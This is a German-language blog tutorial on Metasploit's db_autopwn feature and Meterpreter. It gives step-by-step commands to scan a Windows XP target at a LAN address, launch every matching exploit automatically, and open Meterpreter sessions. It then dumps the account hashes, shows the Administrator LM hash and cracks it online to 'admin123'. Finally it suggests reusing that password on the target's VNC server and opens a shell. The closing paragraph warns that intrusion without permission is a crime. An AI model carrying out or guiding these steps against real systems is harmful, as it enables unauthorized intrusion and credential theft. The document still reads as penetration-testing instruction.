Nachdem ich ein Tutorial über die Grundsteuerung der Metasploit Konsole gemacht hab. Zeige ich euch nun wie man mit der Autopwn Funktion arbeitet. Ausserdem zeige ich euch ein blick in Meterpreter.
Doch erstmal, was ist Autopwn überhaupt. Autopwn ist eine Hilfsfunktion von Metasploit. Mit dieser Funktion ist es einfacher Exploits auf Zielsysteme auszuprobieren.
Autopwn sammelt durch scans (nmap) Informationen über das Zielsystem und guckt dann anhand dieser Informationen welche Exploits für das Ziel geeignet sind und testen dann jeden Exploit aus.
Somit muss man dies nicht mehr per Hand testen. Ob der Exploit funktioniert oder doch ein anderer. Wenn Autopwn mit ein Exploit Erfolg hatte startet er auf das Ziel System eine Meterpreter Session. Meterpreter ist ein sehr mächtiges Payload was viele Informationen über das System hergibt, z.B. Hashdumps von Windows Accounts und einiges mehr. Dazu aber später mehr. Natürlich probiert Autopwn dann die anderen noch ausstehende Exploits auch aus. So könnte es sein das ihr am ende mehrere Meterpreter Session””s habt.
Nun geht aber los.
Unser Ziel ist das System mit der IP 192.168.2.126
Wir starten msfconsole und checken erstmal, mit dem Befehl db_driver, ob eine Datenbanksystem läuft. Ich zeige jetzt nicht wie man sich das installiert. Das erklärt sich ja von selber 
Wir sehen das auf meinem System sqlite3 läuft:
[*] Active Driver: sqlite3
[*] Available: sqlite3
Nun erstellen wir eine Datenbank wo drinne die Informationen gespeichert werden.
Dies geschieht mit dem Befehl:
db_create [db name]
z.B.: db_create client
Nun sammeln wir Informationen bzw. lassen sie uns sammeln.
Ich verwende dazu nmap.
Mit dem Befehl:
db_nmap IP können wir das Zielsystem ab scannen. ( Wer sich mit nmap auskennt kann natürlich auch Parameter verwenden)
Aber ich mach ein einfachen scan ohne irgendwelche Parameter.
db_nmap 192.168.2.126
Uhi auf der Kiste läuft ja ein VNC Server
Das geschulte Auge sieht jetzt schon das es bei dem Ziel um ein Windows Rechner handeln muss.
Also die Informationen sind gesammelt nun können wir eigentlich den Angriff starten.
Dies machen wir mit:
db_autopwn -p -t -e
Kurz zu Erklärung von -p -t -e
-p Wählt Module an Hand der offenen Ports aus
-t listet alle passende Exploits auf
-e startet exploits gegen alle Ziele (Wenn man mehrere Ziel gleichzeitig angreifen will)
Wir sehen hier die Liste der Exploits die Autopwn nun ausprobiert.
Wir sehen nun das 3 Sessions erstellt wurden sind. Also sind 3 Exploits erfolgreich gewesen. Wir sehen auch welche Exploits es genau waren.
Nun wollen wir uns auf das Zielsystem verbinden. Dies geschieht wir folgt:
sessions -i [SessionID]
session -i 3
Nun sind wir auf den Zielrechner.
Wir sehen das wir eine Meterpreter Session haben.
Ich zeige euch jetzt ein bisschen den Umgang mit Meterpreter.
Mit dem Befehl „sysinfo“ bekommen wir mehr Informationen über das System
Wir sehen das es sich hierbei um ein Windows XP SP1 handelt. Der Admin hält anscheint nichts von Updates -.-
Mit dem Befehl ps können wir uns eine Liste ausgeben lassen die die aktuellen laufenden Prozesse beinhalten.
Unseres neues Ziel ist es das Passwort des Administrator Accounts zu bekommen.
Mit dem Befehl „hashdump“ kriegen wir die lm hashes der auf dem System befindeten Accounts.
BILD 8
Wir sehen das der LM hash des Administrator Accounts :
ac804745ee68ebea1aa818381e4e281b
ist. Den können wir nun entweder Lokal mit einem LM Cracker knacken oder lassen dies Online Cracker tun. Was ich machen werde. Http://lmcracker.com
Das Passwort des Administrator Accounts lautet “admin123“ *gähn*
Beim scannen ist ja aufgefallen das auf dem Zielsystem ein VNC Server läuft, was die Prozess liste bestätigt. Nun könnte man ja versuchen mit dem Passwort sich dort einzuloggen.
Zuletzt zeig ich euch wie ihr die CMD verwendet könnt. Die könnt ihr verwenden indem hier den Befehl „shell“ in meterpreter startet 
Achja bevor ich es vergesse. Wenn ihr zurück zur Metasploit Konsole wollt. Und dabei die Session nicht beenden wollt. Könnt ihr mit dem Befehl „background“ die Session wieder in den Hintergrund stellen und später wieder aufrufen mit sessions -i [SessionID]
Ich hoffe ihr konntet wieder etwas zu Metasploit lernen. Natürlich ist das weit noch nicht alles was man mit Meterpreter anstellen kann. Mehr darüber findet ihr mit dem Befehl help.
Ansonsten einfach bisschen rumspielen und googlen
Wer sich mehr mit Metasploit beschäftigen will kann sich ja paar Bücher kaufen:
http://books.google.com/books?q=metasploit
ACHTUNG!!!!!
Natürlich braucht man die Erlaubnis des Administrators wenn man in einem Server eindringen will.
Hat man diese nicht aber man macht es trotzdem begeht man eine Straftat.
Wenn jetzt jemand meint das er mit diesem Wissen scheiße bauen muss, sollte er lieber raus Fußball spielen gehen. Ich hafte nicht dafür wenn ihr zu doof seid und damit eine Straftat begeht ^^
Aber wenn ihr fragen oder so habt, könnt ihr mich gerne fragen.
freak_out [AT] phcn [DOT] de
href="http://freak.roothack.de/blog/">
